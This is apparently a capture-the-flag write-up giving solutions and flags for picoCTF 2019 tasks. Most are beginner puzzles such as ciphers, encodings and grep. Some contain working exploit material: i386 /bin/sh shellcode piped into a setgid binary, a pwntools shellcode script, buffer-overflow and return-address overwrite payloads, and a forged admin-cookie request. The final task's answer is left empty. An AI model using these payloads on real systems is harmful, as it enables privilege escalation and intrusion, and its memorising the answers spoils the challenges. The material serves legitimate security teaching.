Pico CTF 2019
In this article, I will share my answers for picoCTF 2019.
0) The Factory’s Secret – Points: 1
There appear to be some mysterious glyphs hidden inside this abandoned factory… I wonder what would happen if you collected them all?
-> I skip this task's answer. I think that to solve this question you must solve all the other questions first. Therefore, I skip this task.
1) Glory of the Garden – Points: 50 – Forensics
This garden contains more than it seems. You can also find the file in /problems/glory-of-the-garden_0_25ece79ae00914856938a4b19d0e31af on the shell server.
-> I downloaded the file from the given link. I tried to open the image, but it does not open. Then I used the strings command together with grep and found the flag.
strings garden.jpg | grep pico
Here is a flag “picoCTF{more_than_m33ts_the_3y3f089EdF0}”
Answer: picoCTF{more_than_m33ts_the_3y3f089EdF0}
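A way to see where that string lives, as an added example that is not part of the original writeup: an image viewer stops reading a JPEG at the end-of-image marker FF D9, so anything appended after it never affects the picture but still shows up in strings. The sample bytes are constructed.

```python
import re

# Constructed sample: a minimal JPEG skeleton (SOI, one dummy APP0 segment,
# EOI) with text appended after the end-of-image marker.
SAMPLE_JPEG = (
    b"\xff\xd8"                      # SOI: start of image
    b"\xff\xe0\x00\x04\x00\x00"      # dummy APP0 segment, length 4
    b"\xff\xd9"                      # EOI: a viewer stops reading here
    b'Here is a flag "picoCTF{constructed_example}"\n'
)

SOI = b"\xff\xd8"
EOI = b"\xff\xd9"
FLAG_RE = re.compile(rb"picoCTF\{[^}]*\}")


def trailing_data(data: bytes) -> bytes:
    """Return whatever follows the last EOI marker (empty for a clean file).

    Using the *last* EOI matters: embedded EXIF thumbnails are complete
    JPEGs with their own FF D9, so the first one is not the real end."""
    if not data.startswith(SOI):
        raise ValueError("not a JPEG: missing SOI marker")
    idx = data.rfind(EOI)
    if idx < 0:
        raise ValueError("truncated JPEG: no EOI marker")
    return data[idx + len(EOI):]


def find_flags(data: bytes) -> list:
    """The `strings file | grep pico` step, restricted to the appended tail."""
    tail = trailing_data(data)
    return [m.decode("ascii", "replace") for m in FLAG_RE.findall(tail)]


if __name__ == "__main__":
    extra = trailing_data(SAMPLE_JPEG)
    print(f"{len(extra)} bytes after EOI: {extra!r}")
    print(find_flags(SAMPLE_JPEG))
```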
2) Insp3ct0r – Points: 50 – Web Exploitation
Kishor Balan tipped us off that the following code may need inspection: https://2019shell1.picoctf.com/problem/9509/
(link) or http://2019shell1.picoctf.com:9509
-> I opened the website and viewed the page source. There I found 1/3 of the flag. At the top of the HTML file I also found two other files, mycss.css and myjs.js, and the remaining parts of the flag are in those files.
<!-- Html is neat. Anyways have 1/3 of the flag: picoCTF{tru3_d3 -->
/* You need CSS to make pretty pages. Here's part 2/3 of the flag: t3ct1ve_0r_ju5t */
/* Javascript sure is neat. Anyways part 3/3 of the flag: _lucky?9df7e69a} */
The part after the ? can change for each user, so be careful.
Answer: picoCTF{tru3_d3t3ct1ve_0r_ju5t_lucky?9df7e69a}
3) Lets Warm Up – Points: 50 – General Skills
If I told you a word started with 0x70 in hexadecimal, what would it start with in ASCII?
-> We can easily convert hex to ASCII using Python.
# strip the 0x prefix, then turn the hex digits into a byte and decode it
bytes.fromhex("0x70"[2:]).decode("ascii")
The output is 'p'.
Answer: picoCTF{p}
4) The Numbers – Points: 50 – Cryptography
The numbers… what do they mean?
-> The link has an image, shown below. As you can see, the part inside {} is our flag. We can also tell that 16 9 3 15 3 20 6 is picoCTF, and that c and C are both 3, so the order and uppercase do not have an effect. You can use the second image to decode this picture.
Answer: PICOCTF{THENUMBERSMASON}
5) Warmed Up – Points: 50 – Cryptography
What is 0x3D (base 16) in decimal (base 10)
-> Convert hex to an integer. In Python you can use int("0x3D", 16).
Answer: picoCTF{61}
6) 2Warm – Points: 50 – General Skills
Can you convert the number 42(base 10) to binary (base 2)
-> You must convert an integer to binary. You can use the bin() function in Python; in this case it is bin(42).
Answer: picoCTF{101010}
7) handy-shellcode – Points: 50 – Binary Exploitation
This program executes any shellcode that you give it. Can you spawn a shell and use that to read the flag.txt? You can find the program in /problems/handy-shellcode_1_ebc60746fee43ae25c405fc75a234ef5 on the shell server. Source.
-> Note: I am using SSH to connect to the shell server. You can also use the shell page on the website.
These are the files in that directory. As you can see, flag.txt is there but we do not have permission to read it. The vuln binary can read it, because these files are in the same group, and we have permission to execute that file.
First, we must look at the vuln.c file.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUFSIZE 148
#define FLAGSIZE 128

void vuln(char *buf){
  gets(buf);
  puts(buf);
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);

  // Set the gid to the effective gid
  // this prevents /bin/sh from dropping the privileges
  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  char buf[BUFSIZE];

  puts("Enter your shellcode:");
  vuln(buf);
  puts("Thanks! Executing now...");

  ((void (*)())buf)();

  puts("Finishing Executing Shellcode. Exiting now...");

  return 0;
}
We have a getegid() call, which returns the effective group ID of the calling process. After that, setresgid() sets the real, effective and saved group IDs to that value. We also have a gets() call, which reads our input without any length check and can be used for a buffer overflow attack.
file ./vuln returns;
vuln: setgid ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 3.2.0, BuildID[sha1]=7b65fbf1fba331b6b09a6812a338dbb1118e68e9, not stripped
So we need ELF 32-bit Intel 80386 shellcode. I found one; you can also find one on Google.
I used echo -e "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80" > ~/s.txt to save the shellcode. Then I piped the shellcode into the binary with cat ~/s.txt - | ./vuln
Another solution: we can use Python to automate the exploit. First you must install the pwntools package for Python with pip install pwntools. Actually, we can just use the shell server, which already has Python and pwntools installed.
This is our exploit.py
from pwn import *   # process, asm and shellcraft all come from pwntools

sh = process('./vuln')
# wait for the "Enter your shellcode:" prompt, then send an i386 execve("/bin/sh") stub
sh.sendlineafter(':\n', asm(shellcraft.i386.linux.sh()))
sh.interactive()
Answer: picoCTF{h4ndY_d4ndY_sh311c0d3_2cb0ff39}
8) practice-run-1 – Points: 50 – Binary Exploitation
You’re going to need to know how to run programs if you’re going to get out of here. Navigate to /problems/practice-run-1_0_62b61488e896645ebff9b6c97d0e775e on the shell server and run this program to receive a flag.
-> Use the shell and just run the ./run_this executable. It will print the flag.
Answer: picoCTF{g3t_r3adY_2_r3v3r53}
9) unzip – Points: 50 – Forensics
Can you unzip this file and get the flag?
-> Just unzip the file with the unzip command. It contains an image file, and the picture shows the flag.
Answer: picoCTF{unz1pp1ng_1s_3a5y}
10) vault-door-training – Points: 50 – Reverse Engineering
Your mission is to enter Dr. Evil’s laboratory and retrieve the blueprints for his Doomsday Project. The laboratory is protected by a series of locked vault doors. Each door is controlled by a computer and requires a password to open. Unfortunately, our undercover agents have not been able to obtain the secret passwords for the vault doors, but one of our junior agents obtained the source code for each vault’s computer! You will need to read the source code for each level to figure out what the password is for that vault door. As a warmup, we have created a replica vault in our training facility. The source code for the training vault is here: VaultDoorTraining.java
-> When you download the Java code you will see the flag.
import java.util.*;

class VaultDoorTraining {
    public static void main(String args[]) {
        VaultDoorTraining vaultDoor = new VaultDoorTraining();
        Scanner scanner = new Scanner(System.in);
        System.out.print("Enter vault password: ");
        String userInput = scanner.next();
        String input = userInput.substring("picoCTF{".length(),userInput.length()-1);
        if (vaultDoor.checkPassword(input)) {
            System.out.println("Access granted.");
        } else {
            System.out.println("Access denied!");
        }
    }

    // The password is below. Is it safe to put the password in the source code?
    // What if somebody stole our source code? Then they would know what our
    // password is. Hmm... I will think of some ways to improve the security
    // on the other doors.
    //
    // -Minion #9567
    public boolean checkPassword(String password) {
        return password.equals("w4rm1ng_Up_w1tH_jAv4_fcb79c48f5b");
    }
}
Note that the fcb79c48f5b part can be different for each user.
Answer: picoCTF{w4rm1ng_Up_w1tH_jAv4_fcb79c48f5b}
11) 13 – Points: 100 – Cryptography
Cryptography can be easy, do you know what ROT13 is? cvpbPGS{abg_gbb_onq_bs_n_ceboyrz}
-> ROT13 is one of the oldest cipher methods. It shifts each letter by 13 places; applying the same shift again to the ciphertext gives back the plaintext.
Answer: picoCTF{not_too_bad_of_a_problem}
12) Bases – Points: 100 – General Skills
What does this bDNhcm5fdGgzX3IwcDM1 mean? I think it has something to do with bases.
-> The title of the question gives a clue about the algorithm: it is base64-encoded text. You can decode it with an online decoder.
The plaintext is: l3arn_th3_r0p35
Answer: picoCTF{l3arn_th3_r0p35}
13) Easy1 – Points: 100 – Cryptography
The one time pad can be cryptographically secure, but not when you know the key. Can you solve this? We’ve given you the encrypted flag, key, and a table to help UFJKXQZQUNB
with the key of SOLVECRYPTO
. Can you use this table to solve it?.
-> I downloaded the table; you can see it below. It is actually a Vigenère table. To decrypt, we find each key letter of SOLVECRYPTO in the rows, then find the corresponding ciphertext letter in that row; the column header is the plaintext letter. In row S, U is in column C; in row O, F is in column R. If you prefer, you can use an online decoder.
Answer : picoCTF{CRYPTOISFUN}
14) First Grep – Points: 100 – General Skills
Can you find the flag in file? This would be really tedious to look through manually, something tells me there is a better way. You can also find the file in /problems/first-grep_2_04dbf496b78e6c37c0097cdfef734d88 on the shell server.
-> Probably we need to use the grep command on this file. I could not execute the file, because I do not have permission. So I used the strings command with grep:
strings file | grep pico
Answer : picoCTF{grep_is_good_to_find_things_bf6aec61}
15) OverFlow 0 – Points: 100 – Binary Exploitation
This should be easy. Overflow the correct buffer in this program and get a flag. Its also found in /problems/overflow-0_5_db665826dabb99c44758c97abfd8c4c6 on the shell server. Source.
-> This directory has 3 files: flag.txt, vuln and vuln.c. We do not have permission to open flag.txt, but the vuln executable can access it through its group. The attributes are the same as in the handy-shellcode task (#7).
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>   // getegid(), setresgid()

#define FLAGSIZE_MAX 64

char flag[FLAGSIZE_MAX];

void sigsegv_handler(int sig) {
  fprintf(stderr, "%s\n", flag);
  fflush(stderr);
  exit(1);
}

void vuln(char *input){
  char buf[128];
  strcpy(buf, input);
}

int main(int argc, char **argv){

  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("Flag File is Missing. Problem is Misconfigured, please contact an Admin if you are running this on the shell server.\n");
    exit(0);
  }
  fgets(flag,FLAGSIZE_MAX,f);

  signal(SIGSEGV, sigsegv_handler);

  gid_t gid = getegid();
  setresgid(gid, gid, gid);

  if (argc > 1) {
    vuln(argv[1]);
    printf("You entered: %s", argv[1]);
  }
  else
    printf("Please enter an argument next time\n");
  return 0;
}
In this code we have a sigsegv_handler() function, which is bound to the SIGSEGV signal, and inside it an fprintf call that prints our flag. So we must force the program to raise a segmentation fault. The argument is copied into buf with strcpy without any length check, so if we pass more than the buffer size (128 in this case) the program crashes. When you pass 133 characters (5 extra to reach the return address), A's in my case, the program ends up in the SIGSEGV handler.
./vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Answer : picoCTF{3asY_P3a5y4a888b8e}
16) Resources – Points: 100 – General Skills
We put together a bunch of resources to help you out on our website! If you go over there, you might even find a flag! https://picoctf.com/resources
(link)
-> Go to the link. You will see the flag at the bottom of that page.
Answer : picoCTF{r3source_pag3_f1ag}
17) caesar – Points: 100 – Cryptography
Decrypt this message. You can find the ciphertext in /problems/caesar_1_4c9d445f770c71bd84ab0d822197a005 on the shell server.
-> picoCTF{zolppfkdqeboryfzlktjxksyyl} is the ciphertext. The Caesar cipher is a shift cipher; in this case, when you shift each letter by 3 you will see the message.
Answer : picoCTF{crossingtherubiconwmanvbbo}
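Added example (not the author's code) covering the classical-cipher tasks on this page in one place: A1Z26 for The Numbers (#4), ROT13 (#11), the Vigenère table of Easy1 (#13) done as a modular subtraction, and the Caesar shift used here (#17). The inputs are the ciphertexts quoted in those tasks.

```python
import string

ALPHA = string.ascii_uppercase


def shift_decrypt(ciphertext: str, shift: int) -> str:
    """Caesar decryption: move every ASCII letter `shift` places forward in
    the alphabet (wrapping), keeping case and leaving other characters."""
    out = []
    for ch in ciphertext:
        if ch in string.ascii_letters:
            base = ord("A") if ch.isupper() else ord("a")
            out.append(chr((ord(ch) - base + shift) % 26 + base))
        else:
            out.append(ch)
    return "".join(out)


def rot13(text: str) -> str:
    """ROT13 is the Caesar shift of 13; applying it twice is the identity."""
    return shift_decrypt(text, 13)


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    """The table lookup as arithmetic: P = (C - K) mod 26 per letter.
    The key index only advances on letters, so punctuation cannot desync it."""
    out, ki = [], 0
    key = key.upper()
    for ch in ciphertext.upper():
        if ch in ALPHA:
            k = ALPHA.index(key[ki % len(key)])
            out.append(ALPHA[(ALPHA.index(ch) - k) % 26])
            ki += 1
        else:
            out.append(ch)
    return "".join(out)


def a1z26_decode(numbers: str) -> str:
    """Map 1..26 to A..Z, as in the image of The Numbers task."""
    return "".join(ALPHA[int(n) - 1] for n in numbers.split())


if __name__ == "__main__":
    print(a1z26_decode("16 9 3 15 3 20 6"))
    print(rot13("cvpbPGS{abg_gbb_onq_bs_n_ceboyrz}"))
    print(vigenere_decrypt("UFJKXQZQUNB", "SOLVECRYPTO"))
    print(shift_decrypt("zolppfkdqeboryfzlktjxksyyl", 3))
```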
18) dont-use-client-side – Points: 100 – Web Exploitation
Can you break into this super secure portal? https://2019shell1.picoctf.com/problem/49886/
(link) or http://2019shell1.picoctf.com:49886
-> Check the HTML source of this page. You will see a chain of nested if statements.
<script type="text/javascript">
function verify() {
    checkpass = document.getElementById("pass").value;
    split = 4;
    if (checkpass.substring(0, split) == 'pico') {
      if (checkpass.substring(split*6, split*7) == 'e2f2') {
        if (checkpass.substring(split, split*2) == 'CTF{') {
          if (checkpass.substring(split*4, split*5) == 'ts_p') {
            if (checkpass.substring(split*3, split*4) == 'lien') {
              if (checkpass.substring(split*5, split*6) == 'lz_e') {
                if (checkpass.substring(split*2, split*3) == 'no_c') {
                  if (checkpass.substring(split*7, split*8) == '4}') {
                    alert("Password Verified")
                  }
                }
              }
            }
          }
        }
      }
    }
    else {
      alert("Incorrect password");
    }
}
</script>
We can write out the flag by putting the pieces in the order given by the split offsets.
Answer : picoCTF{no_clients_plz_ee2f24}
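An added example, not from the original post: the checks above pin down every 4-character slice of the password, so a small parser over that JavaScript (embedded here as a string) can reassemble the expected value in the order the offsets dictate. The offset expressions are handled by a tiny matcher rather than eval(), and gaps or overlaps between slices are reported instead of silently ignored.

```python
import re

# The conditions from the page's verify() function, as text, so this runs offline.
CLIENT_JS = """
split = 4;
if (checkpass.substring(0, split) == 'pico') {
if (checkpass.substring(split*6, split*7) == 'e2f2') {
if (checkpass.substring(split, split*2) == 'CTF{') {
if (checkpass.substring(split*4, split*5) == 'ts_p') {
if (checkpass.substring(split*3, split*4) == 'lien') {
if (checkpass.substring(split*5, split*6) == 'lz_e') {
if (checkpass.substring(split*2, split*3) == 'no_c') {
if (checkpass.substring(split*7, split*8) == '4}') {
"""

COND_RE = re.compile(r"substring\(\s*([^,]+?)\s*,\s*([^)]+?)\s*\)\s*==\s*'([^']*)'")
SPLIT_RE = re.compile(r"split\s*=\s*(\d+)")


def _offset(expr: str, split: int) -> int:
    """Evaluate the tiny expression language used in the checks:
    '0', 'split' or 'split*N'. Anything else is rejected, not eval()ed."""
    expr = expr.strip()
    if expr == "0":
        return 0
    if expr == "split":
        return split
    m = re.fullmatch(r"split\s*\*\s*(\d+)", expr)
    if not m:
        raise ValueError(f"unsupported offset expression: {expr!r}")
    return split * int(m.group(1))


def reassemble(js: str) -> str:
    """Collect every (start, chunk) pair and join the chunks in start order.
    A gap or overlap means the checks do not pin down one string, so raise."""
    split = int(SPLIT_RE.search(js).group(1))
    pieces = sorted((_offset(start, split), chunk)
                    for start, _end, chunk in COND_RE.findall(js))
    out, expected = [], 0
    for start, chunk in pieces:
        if start != expected:
            raise ValueError(f"chunk at {start} does not follow offset {expected}")
        out.append(chunk)
        expected = start + len(chunk)
    return "".join(out)


if __name__ == "__main__":
    print(reassemble(CLIENT_JS))
```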
19) logon – Points: 100 – Web Exploitation
The factory is hiding things from all of its users. Can you login as logon and find what they’ve been looking at? https://2019shell1.picoctf.com/problem/45163/
(link) or http://2019shell1.picoctf.com:45163
-> When you look at the cookies you will see an admin cookie. Set it to True and refresh the page; you will see the flag.
We can also solve this question using Python.
import requests
import re

# the server trusts a client-supplied admin cookie, so we simply set it
c = {'admin': 'True'}
r = requests.get('http://2019shell1.picoctf.com:45163/flag', cookies=c)
source = r.text
print(re.findall(r'(picoCTF\{.+\})', source)[0])
Answer : picoCTF{th3_c0nsp1r4cy_l1v3s_6679fcb5}
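Added example, not the challenge's own code: the server side is not on the page, so is_admin_insecure is a minimal model of the behaviour described (an admin cookie trusted exactly as the client sends it). Signing the cookie value with an HMAC lets the server reject an edited cookie; SECRET is a constructed value.

```python
import hmac
import hashlib

# Constructed server-side secret; a real deployment loads it from configuration.
SECRET = b"constructed-example-key-do-not-reuse"


def is_admin_insecure(cookies: dict) -> bool:
    """Model of the weakness: any client can send admin=True and be believed."""
    return cookies.get("admin") == "True"


def sign(value: str) -> str:
    """Attach an HMAC-SHA256 tag so the server can recognise its own cookies."""
    tag = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{tag}"


def is_admin_secure(cookies: dict) -> bool:
    """Accept admin only when the value carries a tag the server produced."""
    raw = cookies.get("admin", "")
    value, sep, tag = raw.rpartition(".")
    if not sep:
        return False  # no tag at all: the client made this up
    expected = hmac.new(SECRET, value.encode(), hashlib.sha256).hexdigest()
    # compare_digest avoids leaking the tag byte-by-byte through timing
    return hmac.compare_digest(tag, expected) and value == "True"


if __name__ == "__main__":
    forged = {"admin": "True"}
    print("insecure check, forged cookie:", is_admin_insecure(forged))
    print("secure check, forged cookie:  ", is_admin_secure(forged))
    print("secure check, server-issued:  ", is_admin_secure({"admin": sign("True")}))
```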
20) strings it – Points: 100 – General Skills
Can you find the flag in file without running it? You can also find the file in /problems/strings-it_2_865eec66d190ef75386fb14e15972126 on the shell server.
-> We can use the strings tool to find the flag without running the file (the file itself is named strings):
strings ./strings | grep pico
Answer : picoCTF{5tRIng5_1T_d5b86184}
21) vault-door-1 – Points: 100 – Reverse Engineering
This vault uses some complicated arrays! I hope you can make sense of it, special agent. The source code for this vault is here: VaultDoor1.java
-> The flag is in the VaultDoor1.java file. We must align the letters with the correct index.
import java.util.*;

class VaultDoor1 {
    public static void main(String args[]) {
        VaultDoor1 vaultDoor = new VaultDoor1();
        Scanner scanner = new Scanner(System.in);
        System.out.print("Enter vault password: ");
        String userInput = scanner.next();
        String input = userInput.substring("picoCTF{".length(),userInput.length()-1);
        if (vaultDoor.checkPassword(input)) {
            System.out.println("Access granted.");
        } else {
            System.out.println("Access denied!");
        }
    }

    // I came up with a more secure way to check the password without putting
    // the password itself in the source code. I think this is going to be
    // UNHACKABLE!! I hope Dr. Evil agrees...
    //
    // -Minion #8728
    public boolean checkPassword(String password) {
        return password.length() == 32 &&
               password.charAt(0)  == 'd' &&
               password.charAt(29) == '3' &&
               password.charAt(4)  == 'r' &&
               password.charAt(2)  == '5' &&
               password.charAt(23) == 'r' &&
               password.charAt(3)  == 'c' &&
               password.charAt(17) == '4' &&
               password.charAt(1)  == '3' &&
               password.charAt(7)  == 'b' &&
               password.charAt(10) == '_' &&
               password.charAt(5)  == '4' &&
               password.charAt(9)  == '3' &&
               password.charAt(11) == 't' &&
               password.charAt(15) == 'c' &&
               password.charAt(8)  == 'l' &&
               password.charAt(12) == 'H' &&
               password.charAt(20) == 'c' &&
               password.charAt(14) == '_' &&
               password.charAt(6)  == 'm' &&
               password.charAt(24) == '5' &&
               password.charAt(18) == 'r' &&
               password.charAt(13) == '3' &&
               password.charAt(19) == '4' &&
               password.charAt(21) == 'T' &&
               password.charAt(16) == 'H' &&
               password.charAt(27) == 'd' &&
               password.charAt(30) == '8' &&
               password.charAt(25) == '_' &&
               password.charAt(22) == '3' &&
               password.charAt(28) == '0' &&
               password.charAt(26) == '9' &&
               password.charAt(31) == 'f';
    }
}
password.charAt(0) == ‘d’
password.charAt(1) == ‘3’
password.charAt(2) == ‘5’
password.charAt(3) == ‘c’
password.charAt(4) == ‘r’
password.charAt(5) == ‘4’
password.charAt(6) == ‘m’
password.charAt(7) == ‘b’
password.charAt(8) == ‘l’
password.charAt(9) == ‘3’
password.charAt(10) == ‘_’
password.charAt(11) == ‘t’
password.charAt(12) == ‘H’
password.charAt(13) == ‘3’
password.charAt(14) == ‘_’
password.charAt(15) == ‘c’
password.charAt(16) == ‘H’
password.charAt(17) == ‘4’
password.charAt(18) == ‘r’
password.charAt(19) == ‘4’
password.charAt(20) == ‘c’
password.charAt(21) == ‘T’
password.charAt(22) == ‘3’
password.charAt(23) == ‘r’
password.charAt(24) == ‘5’
password.charAt(25) == ‘_’
password.charAt(26) == ‘9’
password.charAt(27) == ‘d’
password.charAt(28) == ‘0’
password.charAt(29) == ‘3’
password.charAt(30) == ‘8’
password.charAt(31) == ‘f’
Answer : picoCTF{d35cr4mbl3_tH3_cH4r4cT3r5_9d038f}
22) what’s a net cat – Points: 100 – General Skills
Using netcat (nc) is going to be pretty important. Can you connect to 2019shell1.picoctf.com at port 32225 to get the flag?
-> Use netcat to connect to the address:
nc 2019shell1.picoctf.com 32225
Answer : picoCTF{nEtCat_Mast3ry_b1d25ece}
23) where are the robots – Points: 100 – Web Exploitation
Can you find the robots? https://2019shell1.picoctf.com/problem/12267/
(link) or http://2019shell1.picoctf.com:12267
-> The title of the task hints at robots.txt, which lists the pages that robots are not allowed to crawl. So we must check the /robots.txt file.
User-agent: *
Disallow: /713d3.html
In this file the /713d3.html page is disallowed for robots, so we can open that page manually. On that page you will see the flag.
Answer : picoCTF{ca1cu1at1ng_Mach1n3s_713d3}
24) OverFlow 1 – Points: 150 – Binary Exploitation
You beat the first overflow challenge. Now overflow the buffer and change the return address to the flag function in this program? You can find it in /problems/overflow-1_6_0a7153ff536ac8779749bc2dfa4735de on the shell server. Source.
-> These files have the same attributes as in the previous OverFlow task.
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"

#define BUFFSIZE 64
#define FLAGSIZE 64

void flag() {
  char buf[FLAGSIZE];
  FILE *f = fopen("flag.txt","r");
  if (f == NULL) {
    printf("Flag File is Missing. please contact an Admin if you are running this on the shell server.\n");
    exit(0);
  }

  fgets(buf,FLAGSIZE,f);
  printf(buf);
}

void vuln(){
  char buf[BUFFSIZE];
  gets(buf);

  printf("Woah, were jumping to 0x%x !\n", get_return_address());
}

int main(int argc, char **argv){

  setvbuf(stdout, NULL, _IONBF, 0);
  gid_t gid = getegid();
  setresgid(gid, gid, gid);
  puts("Give me a string and lets see what happens: ");
  vuln();
  return 0;
}
We must force the program to go to the flag() function. For this, we must overflow the buffer, and we also need to know the address of flag(). We can use objdump -d ./vuln | grep flag for that. The output is 080485e6, which we must write in little-endian byte order: e6 85 04 08. We also need to overflow the array, whose size is 64, but 64 bytes alone does not work; we must keep increasing the number of A's. After trying one by one, I found that the right size is 76. So we can use cat <(echo -e 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xe6\x85\x04\x08') - | ./vuln
Answer : picoCTF{n0w_w3r3_ChaNg1ng_r3tURn5b80c9cbf}
25) So Meta – Points: 150 – Forensics
Find the flag in this picture. You can also find the file in /problems/so-meta_2_da856426d694a4f0637bf1b169d8524e.
-> Use strings to find the flag:
strings pico_img.png | grep pico
You can also use exiftool pico_img.png; in the Artist field you will see the flag.
Answer : picoCTF{s0_m3ta_3d6ced35}
26) What Lies Within – Points: 150 – Forensics
Theres something in the building. Can you retrieve the flag?
-> I know one image hiding method, which is steganography, so I tried that. I used an online least significant bit steganography decoder. Yes, the flag is there: picoCTF{h1d1ng_1n_th3_b1t5}
Answer : picoCTF{h1d1ng_1n_th3_b1t5}
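Added example, not the author's code: how least-significant-bit steganography hides a message in pixel data and how a decoder like the one used above recovers it. The carrier bytes are constructed with a fixed seed; with a real image you would feed in the raw channel bytes instead.

```python
import random

# Constructed carrier: 512 pseudo-random 8-bit channel values, the shape you
# get from an image library's raw pixel bytes. Fixed seed for reproducibility.
_rng = random.Random(2019)
CARRIER = bytes(_rng.randrange(256) for _ in range(512))


def lsb_embed(carrier: bytes, message: bytes) -> bytes:
    """Hide `message` plus a NUL terminator in the least significant bit of
    successive carrier bytes (one bit per byte, most significant bit first).
    Each carrier byte changes by at most 1, which is invisible in a picture."""
    payload = message + b"\x00"
    bits = [(byte >> i) & 1 for byte in payload for i in range(7, -1, -1)]
    if len(bits) > len(carrier):
        raise ValueError("carrier too small for message")
    out = bytearray(carrier)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def lsb_extract(carrier: bytes) -> bytes:
    """Reverse of lsb_embed: regroup the LSBs 8 at a time until a NUL byte."""
    out, cur, nbits = bytearray(), 0, 0
    for byte in carrier:
        cur = (cur << 1) | (byte & 1)
        nbits += 1
        if nbits == 8:
            if cur == 0:
                return bytes(out)
            out.append(cur)
            cur, nbits = 0, 0
    raise ValueError("no terminator found: probably not LSB-encoded data")


def max_delta(a: bytes, b: bytes) -> int:
    """Largest per-byte change between two buffers (at most 1 for a clean embed)."""
    return max(abs(x - y) for x, y in zip(a, b))


if __name__ == "__main__":
    stego = lsb_embed(CARRIER, b"picoCTF{constructed_example}")
    print(lsb_extract(stego))
    print("max change per byte:", max_delta(CARRIER, stego))
```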
27) extensions – Points: 150 – Forensics
This is a really weird text file TXT? Can you find the flag?
-> I downloaded the file and checked it with the file command. It says this is a PNG image. Then I changed the extension from txt to png and found the flag.
Answer : picoCTF{now_you_know_about_extensions}
28) shark on wire 1 – Points: 150 – Forensics
We found this packet capture. Recover the flag. You can also find the file in /problems/shark-on-wire-1_0_13d709ec13952807e477ba1b5404e620.
-> Probably we must use Wireshark for this task.
Answer : picoCTF{}